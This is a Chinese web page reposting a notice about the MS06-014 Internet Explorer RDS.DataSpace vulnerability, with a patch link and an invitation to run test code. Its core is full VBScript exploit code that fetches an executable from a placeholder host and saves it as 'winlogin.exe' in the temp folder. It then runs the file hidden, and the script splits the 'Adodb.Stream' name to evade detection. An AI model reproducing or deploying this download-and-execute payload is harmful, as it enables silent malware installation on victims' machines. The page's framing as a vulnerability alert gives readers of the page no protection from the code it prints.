作家
登录

【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件

作者: 来源:www.28hudong.com 2013-03-30 03:42:40 阅读 我要评论

请执行下面的代码测试您的机器是否存在漏洞: [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx相关病毒的vbs代码如下:复制代码 代码如下:on error resume next dl = "http://www.xxx.com/xxx.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="winlogin.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0

  推荐阅读

  简单form标准化实例——语义结构

1、使用fieldset和legend标签 在form中,我们经常会对form中的信息进行分组,比如注册form,我们可能会将注册信息分组成基本信息(一般为必填),详细信息(一般为可选),那我们如何更好的来实现呢?我们可考虑在>>>详细阅读


本文标题:【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件

地址:http://www.17bianji.com/kaifa2/JS/30902.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)